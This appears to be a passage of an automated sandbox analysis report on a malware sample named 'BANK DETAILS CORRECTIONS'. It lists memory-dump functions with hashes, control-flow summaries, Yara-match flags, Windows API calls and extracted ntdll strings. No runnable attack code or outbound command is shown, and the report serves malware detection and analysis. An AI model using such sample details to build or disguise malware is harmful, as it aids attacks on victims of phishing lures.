                                                                                    • Instruction Fuzzy Hash: 25015EB1E0020DABDF10DBE5DC42FDEB378AB54304F0081AAE90897240FA34EB548BA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042BBF3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 453e6cfba8c9129f7ee349f91f806ae51a01e0977e6307b71bc45d99f42460d8
                                                                                    • Instruction ID: c2ebf23bf8a8e93cf6e3ed7e6b0dc9686192a16424ea79d4559035af49a5a00d
                                                                                    • Opcode Fuzzy Hash: 453e6cfba8c9129f7ee349f91f806ae51a01e0977e6307b71bc45d99f42460d8
                                                                                    • Instruction Fuzzy Hash: 3FE086753447147BD620EA5AEC41F9BB76CDFC5714F408019FA0C67242C674B90187F4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01962B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 3c1bc8fccb3fb1d7272736cf0f9c9b03d16dd65b7695a18d89b3fec152b40d36
                                                                                    • Instruction ID: 88cdd937a8cd9545f647cf91fed95189d442a3eeaab275bb04f8af9c1128e21c
                                                                                    • Opcode Fuzzy Hash: 3c1bc8fccb3fb1d7272736cf0f9c9b03d16dd65b7695a18d89b3fec152b40d36
                                                                                    • Instruction Fuzzy Hash: BE9002612025000341097158441C616804E9BE0201B55C031E1054590DC52589916225
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01962DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b718d9d7ec66ca47dea8d14403af8c3bf72dd340a34540cb47ce01b1113aa437
                                                                                    • Instruction ID: 029e9dac7dce4cfb8fe1404899387a03c5af09e565dc05cf1cd320d702fa6585
                                                                                    • Opcode Fuzzy Hash: b718d9d7ec66ca47dea8d14403af8c3bf72dd340a34540cb47ce01b1113aa437
                                                                                    • Instruction Fuzzy Hash: 3E90023120150413D1157158450C707404D9BD0241F95C422A0464558DD6568A52A221
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01962C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8055aea14ab7b88b25826921186c591e568560d36c90202e13de019ae869baf3
                                                                                    • Instruction ID: c4e71a7086309dd2fe3367d763fcf027edf77506a9fbc6924d95cec9ac6a08c2
                                                                                    • Opcode Fuzzy Hash: 8055aea14ab7b88b25826921186c591e568560d36c90202e13de019ae869baf3
                                                                                    • Instruction Fuzzy Hash: 8D90023120158802D1147158840C74A40499BD0301F59C421A4464658DC69589917221
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f04a9be9ef99b2f2feb17b9d2beb60f1f9fb6f6a528a03d08e6960eb55dc3bc3
                                                                                    • Instruction ID: 1ae0065d480f3158949c3ded3739873f828b38a783ab809c5d9955b2036f13fa
                                                                                    • Opcode Fuzzy Hash: f04a9be9ef99b2f2feb17b9d2beb60f1f9fb6f6a528a03d08e6960eb55dc3bc3
                                                                                    • Instruction Fuzzy Hash: A690023160560402D1047158451C70650499BD0201F65C421A0464568DC7958A5166A2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004153A1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 36 4153a1-4153ad 37 4153c5-4153cb 36->37 38 4153af-4153b2 36->38 41 415376-415377 37->41 42 4153cc-4153d4 37->42 39 415382 38->39 40 4153b4-4153c3 38->40 45 415379 39->45 46 415383-415391 39->46 40->37 41->45 43 4153d6-4153e0 42->43 44 41540a-415436 call 42dad3 call 42e4e3 call 418c03 42->44 60 4153e2-4153e5 43->60 61 41544b-41546d call 4256a3 43->61 69 41543b-41544a call 404a03 44->69 47 41537b-41537d 45->47 48 4152fc 45->48 46->39 49 415392-415398 46->49 54 41537e-415381 47->54 51 4152d2-4152e8 48->51 52 4152fe-415308 48->52 49->49 55 41539a-41539b 49->55 58 4152ea-4152fa 51->58 59 41534e 51->59 52->59 54->39 55->36 58->48 59->54 63 415350-415355 59->63 65 4153f7-4153fa 60->65 66 4153e7-4153e8 60->66 72 41548d-415493 61->72 73 41546f-41547e PostThreadMessageW 61->73 63->41 66->69 70 4153ea-4153ed 66->70 69->61 70->65 73->72 75 415480-41548a 73->75 75->72
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DC886F4$DC886F4
                                                                                    • API String ID: 0-2189309204
                                                                                    • Opcode ID: 862d7b2a6c360aaa78220afbe2528a1a57d91472e4107e50879de8c1aaf0c283
                                                                                    • Instruction ID: 0b85d369537311390d687d26abeb6c178b81055b760ee89a44215341b0526db2
                                                                                    • Opcode Fuzzy Hash: 862d7b2a6c360aaa78220afbe2528a1a57d91472e4107e50879de8c1aaf0c283
                                                                                    • Instruction Fuzzy Hash: 53410231D04A88FFDB11DBA4DC01ADF7F68EF82394F0446AAE86097201E3694D82C7D8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004153FB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 93 4153fb-41546d call 42dad3 call 42e4e3 call 418c03 call 404a03 call 4256a3 107 41548d-415493 93->107 108 41546f-41547e PostThreadMessageW 93->108 108->107 109 415480-41548a 108->109 109->107
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(DC886F4,00000111,00000000,00000000), ref: 0041547A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: DC886F4$DC886F4
                                                                                    • API String ID: 1836367815-2189309204
                                                                                    • Opcode ID: df382edde562c5137b57b7e5469ad8965567df63001ebe344c0c05c76430cabf
                                                                                    • Instruction ID: f148c3bdcacf736117f5a739be3c2526ec9c890946bf86766c001232612204ac
                                                                                    • Opcode Fuzzy Hash: df382edde562c5137b57b7e5469ad8965567df63001ebe344c0c05c76430cabf
                                                                                    • Instruction Fuzzy Hash: A2110871E0115C7ADB11ABE19C81DEF7B7CDF41394F458069F904AB241E5784F0687B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041539E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(DC886F4,00000111,00000000,00000000), ref: 0041547A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: DC886F4$DC886F4
                                                                                    • API String ID: 1836367815-2189309204
                                                                                    • Opcode ID: 0c9fe3ea84d98d91abba0a634582ccc9f0e6eb57935dbdb8d497115938ed7cf1
                                                                                    • Instruction ID: 6afdc057e73596c918169fd5dccdf02bd1858511460734cbfe86c2ebff124242
                                                                                    • Opcode Fuzzy Hash: 0c9fe3ea84d98d91abba0a634582ccc9f0e6eb57935dbdb8d497115938ed7cf1
                                                                                    • Instruction Fuzzy Hash: 3211E572E0115CBADB11AAE19C81EEF7B7CDF41394F05806AF904AB241E5785E0687B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00415403 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 110 415403-41546d call 42dad3 call 42e4e3 call 418c03 call 404a03 call 4256a3 123 41548d-415493 110->123 124 41546f-41547e PostThreadMessageW 110->124 124->123 125 415480-41548a 124->125 125->123
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(DC886F4,00000111,00000000,00000000), ref: 0041547A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: DC886F4$DC886F4
                                                                                    • API String ID: 1836367815-2189309204
                                                                                    • Opcode ID: 565e4c13c1d60db92e9943f979866ad661dae9a70cb11df164f6fcbaa01586c0
                                                                                    • Instruction ID: 0ed0ca8212df65a8136205b0c2bef0222b79361c4e516e95636b7f27008054fd
                                                                                    • Opcode Fuzzy Hash: 565e4c13c1d60db92e9943f979866ad661dae9a70cb11df164f6fcbaa01586c0
                                                                                    • Instruction Fuzzy Hash: F501D6B1E4111C7ADB11AAE19C81DEF7B7CDF40398F048069FA04B7240E6785E068BF5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00418C83 Relevance: 1.6, APIs: 1, Instructions: 102libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418C75
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 6802180a958eeac38b6ea67b7a7c0e4f8763f99523d6332111b450e28db32ed1
                                                                                    • Instruction ID: 110a0b9ee04f214e87efad0a39a3068594b96c787fc9363dcce442e553ea2a05
                                                                                    • Opcode Fuzzy Hash: 6802180a958eeac38b6ea67b7a7c0e4f8763f99523d6332111b450e28db32ed1
                                                                                    • Instruction Fuzzy Hash: AD21E0B6A405096BDB10EA74D8419EFBBA6FB85350F90916AE40087742FB36E90787D1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042BEF3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8D018956,00000007,00000000,00000004,00000000,0041842B,000000F0,?,?,?,?,?), ref: 0042BF2C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: 5a169732afa6aff991ebcad3fa27065717f0e9bfdc183db1891d71a79b6e1df2
                                                                                    • Instruction ID: 226aa46206b082f3f0b7cc3d1162fd8f06d2a1efa3e686318639b4b52788a07b
                                                                                    • Opcode Fuzzy Hash: 5a169732afa6aff991ebcad3fa27065717f0e9bfdc183db1891d71a79b6e1df2
                                                                                    • Instruction Fuzzy Hash: 2BE06D722403087BD614EE9AEC41E9B73ACEFC9710F404419F908A7242C670BD118BB8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042BEA3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,0041EFBD,?,?,00000000,?,0041EFBD,?,?,?), ref: 0042BEDF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 155d2ca0e49570fce6dd7913210fda3c96ada45557fba19d452b247bf798f79e
                                                                                    • Instruction ID: ebd9232dc1e0bfe1a3e14a6c5c49fa631e3cba523b414052acf990924d099404
                                                                                    • Opcode Fuzzy Hash: 155d2ca0e49570fce6dd7913210fda3c96ada45557fba19d452b247bf798f79e
                                                                                    • Instruction Fuzzy Hash: 2AE0ED752053147FD614EE99EC46E9B77ACDFC9720F404419FA0CA7241D670B9118BB9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042BF33 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,00000000,?,?,887B48C4,?,?,887B48C4), ref: 0042BF6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: f47fe61cd714243a0923b91c7a07fc01a235d49edc0e76cf4567a31063eaecde
                                                                                    • Instruction ID: e3387e90dd4933c7bc34f3c3e13bc4aacfdf77fe87129df439f1b489d453ad12
                                                                                    • Opcode Fuzzy Hash: f47fe61cd714243a0923b91c7a07fc01a235d49edc0e76cf4567a31063eaecde
                                                                                    • Instruction Fuzzy Hash: 3BE04F356003147BD620FA5AEC41FDBB7ACDFC5760F404019FA0CA7242C67579018BE4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01962C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6dd2e59d232d9de3b60771a625f94e67bf46f49175e58542fe50eaa73a6dcd2d
                                                                                    • Instruction ID: b69de59f4f67094dbdc195185d6c1637f056c8ff925a8a577b81c70f78390aad
                                                                                    • Opcode Fuzzy Hash: 6dd2e59d232d9de3b60771a625f94e67bf46f49175e58542fe50eaa73a6dcd2d
                                                                                    • Instruction Fuzzy Hash: E5B09B71D015C5C9DA15F764460C71779487BD0701F15C071D2070641F473CC1D1E275
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 019A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2160512332
                                                                                    • Opcode ID: 9fb1860ce55770feb1d14c7b4cd931898096c312aebe27c11c97cb0be11cca65
                                                                                    • Instruction ID: 838f389c0dafd2fff93fe5340a4e5acdee2ff53e1cf9256df4c05cd7e97ab564
                                                                                    • Opcode Fuzzy Hash: 9fb1860ce55770feb1d14c7b4cd931898096c312aebe27c11c97cb0be11cca65
                                                                                    • Instruction Fuzzy Hash: 95928071604342AFE721CF28C880F6BB7E8BB84754F54492DFA98D7251D770E948CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01958620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Invalid debug info address of this critical section, xrefs: 019954B6
                                                                                    • Address of the debug info found in the active list., xrefs: 019954AE, 019954FA
                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019954E2
                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0199540A, 01995496, 01995519
                                                                                    • corrupted critical section, xrefs: 019954C2
                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019954CE
                                                                                    • Critical section address, xrefs: 01995425, 019954BC, 01995534
                                                                                    • undeleted critical section in freed memory, xrefs: 0199542B
                                                                                    • 8, xrefs: 019952E3
                                                                                    • Critical section debug info address, xrefs: 0199541F, 0199552E
                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01995543
                                                                                    • Critical section address., xrefs: 01995502
                                                                                    • double initialized or corrupted critical section, xrefs: 01995508
                                                                                    • Thread identifier, xrefs: 0199553A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                    • API String ID: 0-2368682639
                                                                                    • Opcode ID: 733c2656ad7cff0df20baaf20b7774f9b0de794cbb154625c3178e5bdad0638e
                                                                                    • Instruction ID: 7b3aab70945cd82104ecf3c531503453aa368a29bc49063ba56ef07a1e8f3db9
                                                                                    • Opcode Fuzzy Hash: 733c2656ad7cff0df20baaf20b7774f9b0de794cbb154625c3178e5bdad0638e
                                                                                    • Instruction Fuzzy Hash: DA818F71E00348EFEF21CF99C845BAEBBB9AB88B14F11415AE50CB7291D371A941CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019922E4
                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01992412
                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01992624
                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01992409
                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01992602
                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0199261F
                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019924C0
                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01992506
                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01992498
                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019925EB
                                                                                    • @, xrefs: 0199259B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                    • API String ID: 0-4009184096
                                                                                    • Opcode ID: 221aee61dedd2e35374e4e3ebd437fa1339877d0a756018ac929443d6877f8a5
                                                                                    • Instruction ID: 91124e71ffa9f6a7cef838340f2d2c3c3cd6dc52475405812298257f002f8426
                                                                                    • Opcode Fuzzy Hash: 221aee61dedd2e35374e4e3ebd437fa1339877d0a756018ac929443d6877f8a5
                                                                                    • Instruction Fuzzy Hash: 290271B1D00229AFDF61DB58CC80BD9B7B8AB54714F4441DAAA4DB7242D730AE84CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                                                    • API String ID: 0-2515994595
                                                                                    • Opcode ID: 39cd2dff7b9f5c7656d609c10743037f2b8977358c81ab6911cb1ac135140fbe
                                                                                    • Instruction ID: 0dc24f6ebc78a7732deebfb1de4ae928325f8a60ead8f886f79904a4327564bb
                                                                                    • Opcode Fuzzy Hash: 39cd2dff7b9f5c7656d609c10743037f2b8977358c81ab6911cb1ac135140fbe
                                                                                    • Instruction Fuzzy Hash: 4751A0715143159BD729DF188844BABBBECEF94B50F14492DEA9DC3240E770D608CB93
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                    • API String ID: 0-1700792311
                                                                                    • Opcode ID: edbdb7ab2936414c40a4d26edd50910b07d2ffde127f4db93e1d9916f7632cdf
                                                                                    • Instruction ID: bcfe491c1257f3a6419ce5cc78e787da3aa8c03a3ddf44fb51f41e1148a0ce04
                                                                                    • Opcode Fuzzy Hash: edbdb7ab2936414c40a4d26edd50910b07d2ffde127f4db93e1d9916f7632cdf
                                                                                    • Instruction Fuzzy Hash: 04D1ED39600686DFDB22DFA8C440AADBFF6FF89714F08C059F94A9B252C7349981CB10
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 019A8A67
                                                                                    • VerifierDebug, xrefs: 019A8CA5
                                                                                    • VerifierDlls, xrefs: 019A8CBD
                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 019A8B8F
                                                                                    • HandleTraces, xrefs: 019A8C8F
                                                                                    • VerifierFlags, xrefs: 019A8C50
                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 019A8A3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
